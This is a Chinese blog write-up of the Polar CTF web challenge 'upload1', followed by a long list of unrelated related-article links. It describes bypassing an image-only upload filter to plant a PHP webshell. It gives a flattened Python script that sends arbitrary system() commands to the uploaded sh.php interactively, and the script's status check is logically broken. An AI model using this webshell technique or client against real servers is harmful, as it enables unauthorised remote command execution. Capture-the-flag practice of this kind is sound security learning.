当前位置: 首页 > news >正文

Polar Web【简单】upload1

Polar Web【简单】upload1

Contents

  • Polar Web【简单】upload1
    • 思路
    • EXP
    • 运行&总结

思路

本题思路同之前两篇文中的文件上传题目性质相同,这里再次记录,旨在改良之前的脚本编写方式 —— 脚本运行后变为可交互的命令行形式。

  1. 打开环境,见要求上传文件,且类型仅为图片类型,因此仍然使用截取数据包的方式修改重发。
  2. 修改数据为木马后重发,未发生其他过滤,上传成功。
  3. 下文呈现可交互式脚本的基本逻辑,以供参考。

index
技巧
成功

EXP

import requestsdef attack(url, cmd):data = {"cmd": cmd}resp = requests.post(url=url, data=data)if not resp.status_code != '200':print("No response...")returnprint(resp.text)if __name__ == '__main__':while True:u = 'http://~.www.polarctf.com:8090/uploads/sh.php'command = input('>> ')if command == 'quit':breakcommand = 'system("' + command + '");'attack(u, command)

运行&总结

发现
flag

  • 重新尝试同类型的题目,通过本题改良了先前的Webshell连接脚本,使得运行后可操作性更强






敬,不完美的明天

相关文章:

  • 【Meetup】探索Apache SeaTunnel的二次开发与实战案例
  • 数据结构初阶 堆(一)
  • PostgreSQL的视图pg_class
  • 【STM32】STM32F103C6T6标准外设库
  • 【傅里叶变换】 关于 Matlab ifft(Y,n) 在C#中实现遇到的问题
  • YOLOv8---seg实例分割(制作数据集,训练模型,预测结果)
  • C++中的lambda表达式详解
  • 前端 JS 经典:下载的流式传输
  • 具有 MOSFET 的电压到电流 (V-I) 转换器电路
  • 企业费用标准如何制定?
  • Python文本处理利器:jieba库全解析
  • CTF简单介绍
  • qmt量化交易策略小白学习笔记第18期【qmt编程之获取对应周期的北向南向数据--方式2:原生python】
  • ceph radosgw 原有zone placement信息丢失数据恢复
  • 华为端云一体化开发 (起步1.0)(HarmonyOS学习第七课)
  • “Material Design”设计规范在 ComponentOne For WinForm 的全新尝试!
  • 《深入 React 技术栈》
  • create-react-app做的留言板
  • ES10 特性的完整指南
  • JavaScript函数式编程(一)
  • Java方法详解
  • jQuery(一)
  • js写一个简单的选项卡
  • Laravel 实践之路: 数据库迁移与数据填充
  • learning koa2.x
  • Node + FFmpeg 实现Canvas动画导出视频
  • PHP 小技巧
  • React 快速上手 - 07 前端路由 react-router
  • Webpack 4x 之路 ( 四 )
  • 百度地图API标注+时间轴组件
  • 两列自适应布局方案整理
  • 聊聊spring cloud的LoadBalancerAutoConfiguration
  • 前端自动化解决方案
  • 入手阿里云新服务器的部署NODE
  • 适配mpvue平台的的微信小程序日历组件mpvue-calendar
  • 移动端解决方案学习记录
  • # AI产品经理的自我修养:既懂用户,更懂技术!
  • $NOIp2018$劝退记
  • (11)工业界推荐系统-小红书推荐场景及内部实践【粗排三塔模型】
  • (3)选择元素——(14)接触DOM元素(Accessing DOM elements)
  • (6)STL算法之转换
  • (C语言)输入自定义个数的整数,打印出最大值和最小值
  • (ZT)出版业改革:该死的死,该生的生
  • (附源码)小程序儿童艺术培训机构教育管理小程序 毕业设计 201740
  • (免费领源码)Java#Springboot#mysql农产品销售管理系统47627-计算机毕业设计项目选题推荐
  • (十一)JAVA springboot ssm b2b2c多用户商城系统源码:服务网关Zuul高级篇
  • (转)Linux下编译安装log4cxx
  • (转)shell中括号的特殊用法 linux if多条件判断
  • (转)使用VMware vSphere标准交换机设置网络连接
  • .md即markdown文件的基本常用编写语法
  • .NET Core SkiaSharp 替代 System.Drawing.Common 的一些用法
  • .net web项目 调用webService
  • .NET 服务 ServiceController
  • .NET8.0 AOT 经验分享 FreeSql/FreeRedis/FreeScheduler 均已通过测试
  • .NET设计模式(8):适配器模式(Adapter Pattern)